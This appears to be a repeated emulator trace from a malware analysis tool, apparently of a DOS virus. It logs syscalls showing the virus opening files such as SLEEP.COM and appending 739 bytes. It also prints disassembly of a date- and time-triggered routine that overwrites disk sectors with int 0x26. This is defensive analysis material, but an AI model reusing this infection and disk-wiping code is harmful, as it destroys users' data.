0x12ba4: jne 0x12bb0
0x12ba6: cmp dh, 7
0x12ba9: jne 0x12bb0
0x12bab: xor ax, ax
0x12bad: jmp 0x12bce
0x12baf: nop
0x12bb0: mov ah, 0x2c
0x12bb2: int 0x21
0x12bb4: or cl, cl
0x12bb6: jne 0x12bdb
0x12bb8: cmp ch, 6
0x12bbb: jge 0x12bdb
0x12bbd: add cl, ch
0x12bbf: mov ax, cx
0x12bc1: cwde
0x12bc2: add al, dh
0x12bc4: adc al, dl
0x12bc6: adc ah, 0
0x12bc9: or ax, ax
2018-12-25T12:55:16.132723102Z 44 PC: 12bb4 | Get time 0x12bb4: or cl, cl
0x12bb6: jne 0x12bdb
0x12bb8: cmp ch, 6
0x12bbb: jge 0x12bdb
0x12bbd: add cl, ch
0x12bbf: mov ax, cx
0x12bc1: cwde
0x12bc2: add al, dh
0x12bc4: adc al, dl
0x12bc6: adc ah, 0
0x12bc9: or ax, ax
0x12bcb: jne 0x12bce
0x12bcd: inc ax
0x12bce: mov dx, ax
0x12bd0: mov cx, 1
0x12bd3: xor bx, bx
0x12bd5: mov ah, 0x19
0x12bd7: int 0x21
0x12bd9: int 0x26
0x12bdb: mov bx, 0x31a
2018-12-25T12:55:16.136553353Z 25 PC: 12bd9 | Get default drive

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":17207,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:55:16.049057451Z 26 PC: 12aa5 | Set disk transfer address
2018-12-25T12:55:16.050377666Z 78 PC: 12afb | Find first file
2018-12-25T12:55:16.055048821Z 61 PC: 12b07 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:55:16.059380125Z 63 PC: 12b16 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:55:16.0665615Z 66 PC: 12b2d | Move file pointer
2018-12-25T12:55:16.068138424Z 64 PC: 12b41 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:55:16.070899778Z 64 PC: 12b4c | Write file or device (Write 739 bytes on handle 5)
2018-12-25T12:55:16.086628067Z 66 PC: 12b55 | Move file pointer
2018-12-25T12:55:16.088421404Z 64 PC: 12b73 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:55:16.095330003Z 62 PC: 12aef | Close file
2018-12-25T12:55:16.103852473Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:16.106916768Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:16.114561636Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:16.121313752Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:55:16.123419229Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T12:55:16.126297441Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T12:55:16.1347729Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T12:55:16.136506265Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T12:55:16.143692408Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:16.153319026Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:16.157078118Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:16.164189196Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:16.16997642Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:55:16.172104865Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T12:55:16.174819012Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T12:55:16.18063431Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T12:55:16.181778414Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T12:55:16.189361634Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:16.198736753Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:16.201442748Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:16.210058466Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:16.217133795Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:55:16.219312839Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T12:55:16.226312901Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T12:55:16.236015055Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T12:55:16.237911183Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T12:55:16.247015589Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:16.256784683Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:16.259893641Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:16.26886139Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:16.277616119Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:55:16.279486566Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T12:55:16.283654898Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T12:55:16.289612835Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T12:55:16.290808376Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T12:55:16.297687976Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:16.307128049Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:16.310934492Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:16.315813284Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:16.320741455Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:55:16.323178393Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T12:55:16.326641518Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T12:55:16.458681723Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T12:55:16.461553649Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T12:55:16.468984253Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:16.577463984Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:16.582506532Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:16.587056149Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:16.591634913Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:55:16.592952573Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T12:55:16.594911388Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T12:55:16.66585522Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T12:55:16.667778388Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T12:55:16.675542335Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:16.685035613Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:16.688254379Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:16.695650256Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:16.699450334Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:16.702233739Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:16.705121853Z 42 PC: 12ba1 | Get date 0x12ba1: cmp dl, 4
0x12ba4: jne 0x12bb0
0x12ba6: cmp dh, 7
0x12ba9: jne 0x12bb0
0x12bab: xor ax, ax
0x12bad: jmp 0x12bce
0x12baf: nop
0x12bb0: mov ah, 0x2c
0x12bb2: int 0x21
0x12bb4: or cl, cl
0x12bb6: jne 0x12bdb
0x12bb8: cmp ch, 6
0x12bbb: jge 0x12bdb
0x12bbd: add cl, ch
0x12bbf: mov ax, cx
0x12bc1: cwde
0x12bc2: add al, dh
0x12bc4: adc al, dl
0x12bc6: adc ah, 0
0x12bc9: or ax, ax
2018-12-25T12:55:16.70764595Z 44 PC: 12bb4 | Get time 0x12bb4: or cl, cl
0x12bb6: jne 0x12bdb
0x12bb8: cmp ch, 6
0x12bbb: jge 0x12bdb
0x12bbd: add cl, ch
0x12bbf: mov ax, cx
0x12bc1: cwde
0x12bc2: add al, dh
0x12bc4: adc al, dl
0x12bc6: adc ah, 0
0x12bc9: or ax, ax
0x12bcb: jne 0x12bce
0x12bcd: inc ax
0x12bce: mov dx, ax
0x12bd0: mov cx, 1
0x12bd3: xor bx, bx
0x12bd5: mov ah, 0x19
0x12bd7: int 0x21
0x12bd9: int 0x26
0x12bdb: mov bx, 0x31a
2018-12-25T12:55:16.710830455Z 25 PC: 12bd9 | Get default drive

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":17207,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:55:16.074968745Z 26 PC: 12aa5 | Set disk transfer address
2018-12-25T12:55:16.076262934Z 78 PC: 12afb | Find first file
2018-12-25T12:55:16.081926493Z 61 PC: 12b07 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:55:16.088101405Z 63 PC: 12b16 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:55:16.094775878Z 66 PC: 12b2d | Move file pointer
2018-12-25T12:55:16.095975205Z 64 PC: 12b41 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:55:16.098415782Z 64 PC: 12b4c | Write file or device (Write 739 bytes on handle 5)
2018-12-25T12:55:16.113687973Z 66 PC: 12b55 | Move file pointer
2018-12-25T12:55:16.114892434Z 64 PC: 12b73 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:55:16.121052318Z 62 PC: 12aef | Close file
2018-12-25T12:55:16.129091202Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:16.131524423Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:16.137678705Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:16.14388917Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:55:16.145294298Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T12:55:16.147691501Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T12:55:16.155300605Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T12:55:16.156729179Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T12:55:16.164173557Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:16.172004003Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:16.174706068Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:16.180844943Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:16.186769865Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:55:16.18824747Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T12:55:16.190640318Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T12:55:16.198151379Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T12:55:16.199670671Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T12:55:16.205820942Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:16.213642896Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:16.216472018Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:16.22270618Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:16.229058754Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:55:16.230789135Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T12:55:16.233251203Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T12:55:16.240857606Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T12:55:16.242345402Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T12:55:16.248499676Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:16.256257193Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:16.259188802Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:16.265244158Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:16.271044307Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:55:16.272560628Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T12:55:16.274979503Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T12:55:16.28247666Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T12:55:16.284058601Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T12:55:16.29066071Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:16.298524643Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:16.301585778Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:16.307962191Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:16.314151864Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:55:16.318826838Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T12:55:16.321727196Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T12:55:16.330256764Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T12:55:16.332679644Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T12:55:16.339177331Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:16.347097003Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:16.350038471Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:16.356921651Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:16.363008402Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:55:16.364559766Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T12:55:16.367070482Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T12:55:16.374650055Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T12:55:16.376270954Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T12:55:16.382434321Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:16.466973169Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:16.470098141Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:16.47671119Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:16.479196143Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:16.481436339Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:16.484073769Z 42 PC: 12ba1 | Get date 0x12ba1: cmp dl, 4
0x12ba4: jne 0x12bb0
0x12ba6: cmp dh, 7
0x12ba9: jne 0x12bb0
0x12bab: xor ax, ax
0x12bad: jmp 0x12bce
0x12baf: nop
0x12bb0: mov ah, 0x2c
0x12bb2: int 0x21
0x12bb4: or cl, cl
0x12bb6: jne 0x12bdb
0x12bb8: cmp ch, 6
0x12bbb: jge 0x12bdb
0x12bbd: add cl, ch
0x12bbf: mov ax, cx
0x12bc1: cwde
0x12bc2: add al, dh
0x12bc4: adc al, dl
0x12bc6: adc ah, 0
0x12bc9: or ax, ax
2018-12-25T12:55:16.486424091Z 44 PC: 12bb4 | Get time 0x12bb4: or cl, cl
0x12bb6: jne 0x12bdb
0x12bb8: cmp ch, 6
0x12bbb: jge 0x12bdb
0x12bbd: add cl, ch
0x12bbf: mov ax, cx
0x12bc1: cwde
0x12bc2: add al, dh
0x12bc4: adc al, dl
0x12bc6: adc ah, 0
0x12bc9: or ax, ax
0x12bcb: jne 0x12bce
0x12bcd: inc ax
0x12bce: mov dx, ax
0x12bd0: mov cx, 1
0x12bd3: xor bx, bx
0x12bd5: mov ah, 0x19
0x12bd7: int 0x21
0x12bd9: int 0x26
0x12bdb: mov bx, 0x31a
2018-12-25T12:55:16.489220521Z 25 PC: 12bd9 | Get default drive

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":17207,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:55:16.112238262Z 26 PC: 12aa5 | Set disk transfer address
2018-12-25T12:55:16.113611475Z 78 PC: 12afb | Find first file
2018-12-25T12:55:16.119648881Z 61 PC: 12b07 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:55:16.125791409Z 63 PC: 12b16 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:55:16.132311227Z 66 PC: 12b2d | Move file pointer
2018-12-25T12:55:16.133522083Z 64 PC: 12b41 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:55:16.135897523Z 64 PC: 12b4c | Write file or device (Write 739 bytes on handle 5)
2018-12-25T12:55:16.150851181Z 66 PC: 12b55 | Move file pointer
2018-12-25T12:55:16.152107702Z 64 PC: 12b73 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:55:16.158551035Z 62 PC: 12aef | Close file
2018-12-25T12:55:16.166466113Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:16.168783609Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:16.174822491Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:16.182140371Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:55:16.183348859Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T12:55:16.185611128Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T12:55:16.193272925Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T12:55:16.194281142Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T12:55:16.19813716Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:16.204079861Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:16.205790533Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:16.209609732Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:16.213580631Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:55:16.215000855Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T12:55:16.217388281Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T12:55:16.225512966Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T12:55:16.226862179Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T12:55:16.232873841Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:16.240656785Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:16.24363735Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:16.249824371Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:16.256079617Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:55:16.257538215Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T12:55:16.259974966Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T12:55:16.267594008Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T12:55:16.268903788Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T12:55:16.27281868Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:16.278013726Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:16.280511361Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:16.287545265Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:16.293837946Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:55:16.295534164Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T12:55:16.298040578Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T12:55:16.305512921Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T12:55:16.307449955Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T12:55:16.314040358Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:16.322271067Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:16.32452167Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:16.328327493Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:16.332469047Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:55:16.333846533Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T12:55:16.335502624Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T12:55:16.341501355Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T12:55:16.343123306Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T12:55:16.349526337Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:16.357328747Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:16.360118328Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:16.366124274Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:16.371987027Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:55:16.37354283Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T12:55:16.375915893Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T12:55:16.383341357Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T12:55:16.385003931Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T12:55:16.391005342Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:16.552782293Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:16.555104519Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:16.561427159Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:16.563742359Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:16.566384897Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:16.567928283Z 42 PC: 12ba1 | Get date 0x12ba1: cmp dl, 4
0x12ba4: jne 0x12bb0
0x12ba6: cmp dh, 7
0x12ba9: jne 0x12bb0
0x12bab: xor ax, ax
0x12bad: jmp 0x12bce
0x12baf: nop
0x12bb0: mov ah, 0x2c
0x12bb2: int 0x21
0x12bb4: or cl, cl
0x12bb6: jne 0x12bdb
0x12bb8: cmp ch, 6
0x12bbb: jge 0x12bdb
0x12bbd: add cl, ch
0x12bbf: mov ax, cx
0x12bc1: cwde
0x12bc2: add al, dh
0x12bc4: adc al, dl
0x12bc6: adc ah, 0
0x12bc9: or ax, ax
2018-12-25T12:55:16.569246695Z 44 PC: 12bb4 | Get time 0x12bb4: or cl, cl
0x12bb6: jne 0x12bdb
0x12bb8: cmp ch, 6
0x12bbb: jge 0x12bdb
0x12bbd: add cl, ch
0x12bbf: mov ax, cx
0x12bc1: cwde
0x12bc2: add al, dh
0x12bc4: adc al, dl
0x12bc6: adc ah, 0
0x12bc9: or ax, ax
0x12bcb: jne 0x12bce
0x12bcd: inc ax
0x12bce: mov dx, ax
0x12bd0: mov cx, 1
0x12bd3: xor bx, bx
0x12bd5: mov ah, 0x19
0x12bd7: int 0x21
0x12bd9: int 0x26
0x12bdb: mov bx, 0x31a
2018-12-25T12:55:16.571642303Z 25 PC: 12bd9 | Get default drive

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":17207,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:55:16.474327923Z 26 PC: 12aa5 | Set disk transfer address
2018-12-25T12:55:16.475787946Z 78 PC: 12afb | Find first file
2018-12-25T12:55:16.481586406Z 61 PC: 12b07 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:55:16.487789468Z 63 PC: 12b16 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:55:16.494163323Z 66 PC: 12b2d | Move file pointer
2018-12-25T12:55:16.495388263Z 64 PC: 12b41 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:55:16.497765926Z 64 PC: 12b4c | Write file or device (Write 739 bytes on handle 5)
2018-12-25T12:55:17.236871106Z 66 PC: 12b55 | Move file pointer
2018-12-25T12:55:17.238338912Z 64 PC: 12b73 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:55:17.244855466Z 62 PC: 12aef | Close file
2018-12-25T12:55:17.256959505Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:17.259659887Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:17.263793958Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:17.267729595Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:55:17.269156518Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T12:55:17.27088282Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T12:55:17.276745922Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T12:55:17.279066629Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T12:55:17.283828133Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:17.28987364Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:17.293911145Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:17.300416823Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:17.30710137Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:55:17.309587341Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T12:55:17.312512497Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T12:55:17.320380426Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T12:55:17.322028323Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T12:55:17.328752265Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:17.337276836Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:17.354054277Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:17.360795727Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:17.367455578Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:55:17.36946212Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T12:55:17.37213471Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T12:55:17.37995048Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T12:55:17.382413484Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T12:55:17.389715911Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:17.397446366Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:17.400052615Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:17.406721085Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:17.412849167Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:55:17.414415525Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T12:55:17.417470805Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T12:55:17.423467497Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T12:55:17.424651292Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T12:55:17.429975281Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:17.435718425Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:17.43764093Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:17.441942053Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:17.446302543Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:55:17.447478239Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T12:55:17.45064832Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T12:55:17.45633608Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T12:55:17.457339885Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T12:55:17.461669066Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:17.466992607Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:17.468766759Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:17.473455052Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:17.479902482Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:55:17.481201242Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T12:55:17.484858121Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T12:55:17.492842182Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T12:55:17.494272798Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T12:55:17.501920841Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:17.509746448Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:17.512129774Z 61 PC: 12b07 | Open file (See above)
2018-12-25T12:55:17.519436117Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T12:55:17.522079235Z 62 PC: 12aef | Close file (See above)
2018-12-25T12:55:17.524061161Z 79 PC: 12afb | Find next file (See above)
2018-12-25T12:55:17.527281584Z 42 PC: 12ba1 | Get date 0x12ba1: cmp dl, 4
0x12ba4: jne 0x12bb0
0x12ba6: cmp dh, 7
0x12ba9: jne 0x12bb0
0x12bab: xor ax, ax
0x12bad: jmp 0x12bce
0x12baf: nop
0x12bb0: mov ah, 0x2c
0x12bb2: int 0x21
0x12bb4: or cl, cl
0x12bb6: jne 0x12bdb
0x12bb8: cmp ch, 6
0x12bbb: jge 0x12bdb
0x12bbd: add cl, ch
0x12bbf: mov ax, cx
0x12bc1: cwde
0x12bc2: add al, dh
0x12bc4: adc al, dl
0x12bc6: adc ah, 0
0x12bc9: or ax, ax
2018-12-25T12:55:17.529602508Z 44 PC: 12bb4 | Get time 0x12bb4: or cl, cl
0x12bb6: jne 0x12bdb
0x12bb8: cmp ch, 6
0x12bbb: jge 0x12bdb
0x12bbd: add cl, ch
0x12bbf: mov ax, cx
0x12bc1: cwde
0x12bc2: add al, dh
0x12bc4: adc al, dl
0x12bc6: adc ah, 0
0x12bc9: or ax, ax
0x12bcb: jne 0x12bce
0x12bcd: inc ax
0x12bce: mov dx, ax
0x12bd0: mov cx, 1
0x12bd3: xor bx, bx
0x12bd5: mov ah, 0x19
0x12bd7: int 0x21
0x12bd9: int 0x26
0x12bdb: mov bx, 0x31a
2018-12-25T12:55:17.531938969Z 25 PC: 12bd9 | Get default drive

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":17207,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
